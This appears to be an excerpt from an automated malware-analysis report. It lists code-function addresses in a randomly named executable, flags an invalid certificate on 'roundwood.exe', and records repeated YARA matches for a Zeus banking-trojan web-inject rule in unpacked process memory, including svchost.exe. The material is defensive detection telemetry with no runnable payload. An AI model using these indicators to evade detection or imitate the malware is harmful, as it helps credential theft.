Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6F190	5_2_00E6F190
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3E140	5_2_00E3E140
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E582E0	5_2_00E582E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E712F0	5_2_00E712F0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6BAB0	5_2_00E6BAB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E643A0	5_2_00E643A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E66380	5_2_00E66380
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6D370	5_2_00E6D370
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E32CE0	5_2_00E32CE0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E63DC0	5_2_00E63DC0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E38640	5_2_00E38640
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6AE40	5_2_00E6AE40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E5EE30	5_2_00E5EE30
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E69FF0	5_2_00E69FF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6FF30	5_2_00E6FF30
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6DF00	5_2_00E6DF00
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6C710	5_2_00E6C710
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DD40E0	5_2_00DD40E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E051C0	5_2_00E051C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DD9A40	5_2_00DD9A40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E0C240	5_2_00E0C240
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E12A4D	5_2_00E12A4D
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E00230	5_2_00E00230
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E0B3F0	5_2_00E0B3F0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E11330	5_2_00E11330
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E0F300	5_2_00E0F300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E0DB10	5_2_00E0DB10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E10C60	5_2_00E10C60
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E06C40	5_2_00E06C40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DD9C60	5_2_00DD9C60
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DEE460	5_2_00DEE460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E15410	5_2_00E15410
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E075A0	5_2_00E075A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E10590	5_2_00E10590
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DDF540	5_2_00DDF540
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DF96E0	5_2_00DF96E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E0CEB0	5_2_00E0CEB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E18FC3	5_2_00E18FC3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E057A0	5_2_00E057A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E07780	5_2_00E07780
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E0E770	5_2_00E0E770
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001FCEC1	8_2_001FCEC1
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E78860	8_2_00E78860
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E8D060	8_2_00E8D060
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EAF860	8_2_00EAF860
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA5840	8_2_00EA5840
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EB4010	8_2_00EB4010
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EB81C3	8_2_00EB81C3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA61A0	8_2_00EA61A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EAF190	8_2_00EAF190
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7E140	8_2_00E7E140
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E982E0	8_2_00E982E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EB12F0	8_2_00EB12F0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EABAB0	8_2_00EABAB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA43A0	8_2_00EA43A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA6380	8_2_00EA6380
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EAD370	8_2_00EAD370
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E72CE0	8_2_00E72CE0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA3DC0	8_2_00EA3DC0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E78640	8_2_00E78640
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EAAE40	8_2_00EAAE40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E9EE30	8_2_00E9EE30
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA9FF0	8_2_00EA9FF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EAFF30	8_2_00EAFF30
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EADF00	8_2_00EADF00
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EAC710	8_2_00EAC710
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C540E0	8_2_00C540E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C851C0	8_2_00C851C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C92A4D	8_2_00C92A4D
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C59A40	8_2_00C59A40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C8C240	8_2_00C8C240
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C80230	8_2_00C80230
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C8B3F0	8_2_00C8B3F0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C8F300	8_2_00C8F300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C8DB10	8_2_00C8DB10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C91330	8_2_00C91330
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C86C40	8_2_00C86C40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C59C60	8_2_00C59C60
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C6E460	8_2_00C6E460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C90C60	8_2_00C90C60
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C95410	8_2_00C95410
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C90590	8_2_00C90590
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C875A0	8_2_00C875A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C5F540	8_2_00C5F540
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C796E0	8_2_00C796E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C8CEB0	8_2_00C8CEB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C98FC3	8_2_00C98FC3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C87780	8_2_00C87780
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C857A0	8_2_00C857A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C8E770	8_2_00C8E770

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe

Code function: String function: 001F1BB0 appears 33 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4268 -ip 4268

Source: roundwood.exe

Static PE information: invalid certificate

Source: roundwood.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1452000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.38.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2915c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2d63c00.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.39.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
